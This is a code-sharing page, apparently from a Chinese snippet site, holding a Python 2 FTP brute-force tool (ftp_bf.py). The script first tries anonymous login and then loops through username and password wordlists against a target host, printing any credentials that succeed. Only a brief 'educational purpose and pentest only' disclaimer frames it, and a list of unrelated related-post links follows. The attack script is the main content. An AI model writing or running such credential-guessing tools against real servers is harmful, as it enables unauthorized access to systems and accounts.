Python FTP暴力破解工具,pythonftp暴力破解,[Python]代码#!
Python FTP暴力破解工具,pythonftp暴力破解,[Python]代码#!
[Python]代码
#!/usr/bin/env python#-*-coding = utf-8-*-#author:@xfk#blog:@blog.sina.com.cn/kaiyongdeng#date:@2012-05-08import sys, os, time from ftplib import FTPdocs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ftp_bf.py [*] Coder : [*] Version : 0.1 [*] ample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt """if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear'else: clearing = 'cls'os.system(clearing)R = "\033[31m";G = "\033[32m";Y = "\033[33m"END = "\033[0m"def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | 08/05/2012 ftp_bf.py v.0.1 |" print " | FTP Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.strftime("%X") print docs+ENDdef help(): print R+"[*]-t, --target ip/hostname <> Our target" print "[*]-u, --usernamelist usernamelist <> usernamelist path" print "[*]-p, --passwordlist passwordlist <> passwordlist path" print "[*]-h, --help help <> print this help" print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)def bf_login(hostname,username,password):# sys.stdout.write("\r[!]Checking : %s " % (p))# sys.stdout.flush() try: ftp = FTP(hostname) ftp.login(hostname,username, password) ftp.retrlines('list') ftp.quit() print Y+"\n[!] w00t,w00t!!! We did it ! " print "[+] Target : ",hostname, "" print "[+] User : ",username, "" print "[+] Password : ",password, ""+END return 1# sys.exit(1) except Exception, e: pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END sys.exit(1)def anon_login(hostname): try: print G+"\n[!] Checking for anonymous login.\n"+END ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END ftp.quit() except Exception, e: print R+"\n[-] Anonymous login failed...\n"+END passdef main(): logo() try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--usernamelist': usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-p' or arg.lower() == '--passwordlist': passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= 1: help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"[!] BruteForcing target ..."+END anon_login(hostname)# print "here is ok"# print hostname try: usernames = open(usernamelist, "r") user = usernames.readlines() count1 = 0 while count1 < len(user): user[count1] = user[count1].strip() count1 +=1 except: print R+"\n[-] Cheak your usernamelist path\n"+END sys.exit(1)# print "here is ok ",usernamelist,passwordlist try: passwords = open(passwordlist, "r") pwd = passwords.readlines() count2 = 0 while count2 < len(pwd): pwd[count2] = pwd[count2].strip() count2 +=1 except: print R+"\n[-] Check your passwordlist path\n"+END sys.exit(1) print G+"\n[+] Loaded:",len(user),"usernames" print "\n[+] Loaded:",len(pwd),"passwords" print "[+] Target:",hostname print "[+] Guessing...\n"+END for u in user: for p in pwd: result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) if result != 1: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END else: print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END if not result : print R+"\n[-]There is no username ans password enabled in the list." print "[-]Exiting...\n"+ENDif __name__ == "__main__": main()
相关内容
- SSH代理连接器,ssh连接器,[Python]代码#
- 从百度MP3中批量下载某歌手的歌,百度mp3歌手,download
- python之POP详解,pythonpop,[Python]代码#!
- Basic Blog,basicblog,main.pyimpor
- 使用Gmail发送邮件的Python脚本,gmailpython,[Python]代码
- [娱乐] 画菱形,娱乐画菱形,[Python]代码 w
- User signup (HTML and Python),signuppython,[Python]代码#!
- 基于python的web表单提交方法,pythonweb表单,[Python]代码
- rsync同步管理工具,rsync同步工具,[Python]代码#/
- 有一位农场主的遗嘱:第1个儿子分100美元和剩下财产的
评论关闭